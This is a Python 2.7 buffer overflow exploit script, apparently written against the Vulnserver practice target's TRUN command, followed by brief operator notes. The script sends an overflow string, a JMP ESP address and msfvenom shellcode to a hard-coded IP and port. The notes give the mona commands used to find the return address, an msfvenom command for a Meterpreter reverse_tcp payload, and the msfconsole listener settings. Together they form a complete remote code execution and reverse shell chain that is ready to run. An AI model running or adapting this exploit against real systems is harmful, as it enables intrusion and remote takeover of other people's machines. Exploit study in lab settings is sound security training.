  1 #!/usr/bin/python2.7
  2 
  3 import socket
  4 
  5 '''
  6 625012a0
  7 625012ad
  8 '''
  9 
 10 buf = "TRUN /.:/"         #Exploit
 11 buf += "A" * 2003         #Buffer Overflow
 12 buf += "\xa0\x12\x50\x62" #JMP ESP
 13 buf += "\x90" * 15
 14 buf += b"\xd9\xc8\xd9\x74\x24\xf4\xba\xf5\xff\x83\x53\x5e"
 15 buf += b"\x33\xc9\xb1\x59\x31\x56\x19\x03\x56\x19\x83\xc6"
 16 buf += b"\x04\x17\x0a\x7f\xbb\x58\xf5\x80\x3c\x06\xc7\x52"
 17 buf += b"\xb5\x23\x43\xd8\x94\x9b\x07\x8c\x14\x50\x45\x25"
 18 buf += b"\x2a\xd1\x20\x63\x05\xe2\x3e\x19\x4d\x2d\x81\x72"
 19 buf += b"\xb1\x2c\x7d\x89\xe6\x8e\xbc\x42\xfb\xcf\xf9\x14"
 20 buf += b"\x71\x20\x57\xf0\xf2\xec\x48\x75\x46\x2c\x68\x59"
 21 buf += b"\xcc\x0c\x12\xdc\x13\xf8\xae\xdf\x43\x8b\x67\xf8"
 22 buf += b"\x33\x00\x2f\xd8\xb2\xc5\x55\xd1\xc1\xd5\x1c\xd3"
 23 buf += b"\xd6\xae\xab\x98\x28\x66\xe2\x5e\xeb\x49\x08\xf3"
 24 buf += b"\xed\x92\x2b\xeb\x9b\xe8\x4f\x96\x9b\x2b\x2d\x4c"
 25 buf += b"\x29\xab\x95\x07\x89\x0f\x27\xcb\x4c\xc4\x2b\xa0"
 26 buf += b"\x1b\x82\x2f\x37\xcf\xb9\x54\xbc\xee\x6d\xdd\x86"
 27 buf += b"\xd4\xa9\x85\x5d\x74\xe8\x63\x33\x89\xea\xcc\xec"
 28 buf += b"\x2f\x61\xfe\xfb\x50\x8a\x00\x04\x0d\x1c\xcc\xc9"
 29 buf += b"\xae\xdc\x5a\x59\xdc\xee\xc5\xf1\x4a\x42\x8d\xdf"
 30 buf += b"\x8d\xd3\x99\xdf\x42\x5b\xc9\x21\x63\x9b\xc3\xe5"
 31 buf += b"\x37\xcb\x7b\xcf\x37\x80\x7b\xf0\xed\x3c\x76\x66"
 32 buf += b"\x04\xf2\x99\x8a\x70\xf0\xa5\x68\x8b\x7d\x43\xdc"
 33 buf += b"\xdb\x2d\xdc\x9d\x8b\x8d\x8c\x75\xc6\x02\xf2\x66"
 34 buf += b"\xe9\xc9\x9b\x0d\x06\xa7\xf4\xb9\xbf\xe2\x8f\x58"
 35 buf += b"\x3f\x39\xea\x5b\xcb\xcb\x0a\x15\x3c\xbe\x18\x42"
 36 buf += b"\x5b\x40\xe1\x93\xce\x40\x8b\x97\x58\x17\x23\x9a"
 37 buf += b"\xbd\x5f\xec\x65\xe8\xdc\xeb\x9a\x6d\xd4\x80\xad"
 38 buf += b"\xfb\x58\xff\xd1\xeb\x58\xff\x87\x61\x58\x97\x7f"
 39 buf += b"\xd2\x0b\x82\x7f\xcf\x38\x1f\xea\xf0\x68\xf3\xbd"
 40 buf += b"\x98\x96\x2a\x89\x06\x69\x19\x89\x41\x95\xdf\xa6"
 41 buf += b"\xe9\xfd\x1f\xf7\x09\xfd\x75\xf7\x59\x95\x82\xd8"
 42 buf += b"\x56\x55\x6a\xf3\x3e\xfd\xe1\x92\x8d\x9c\xf6\xbe"
 43 buf += b"\x50\x00\xf6\x4d\x49\xb3\x8d\x3e\x6e\x34\x72\x57"
 44 buf += b"\x0b\x35\x72\x57\x2d\x0a\xa4\x6e\x5b\x4d\x74\xd5"
 45 buf += b"\x54\xf8\xd9\x7c\xff\x02\x4d\x7e\x2a"
 46 
 47 s = socket.socket (socket.AF_INET, socket.SOCK_STREAM) #Creates ipv4 Socket 
 48 s.connect(("192.168.28.179", 9999))   #IP and port to connect to
 49 print s.recv(1024)                #print response
 50 s.send(buf)                       #send the variable buf
 51 print s.recv(1024)                #print response
 52 s.close()


!mona modules gave me .dll 
!mona jmp -r esp -m "essfunc.dll"


Payload: msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.50.31.252 LPORT=6666 -b"x\00" -f python

msfconsole: set payload windows/meterpreter/reverse_tcp
            set lhost 10.50.31.252
            set lport 6666
            exploit
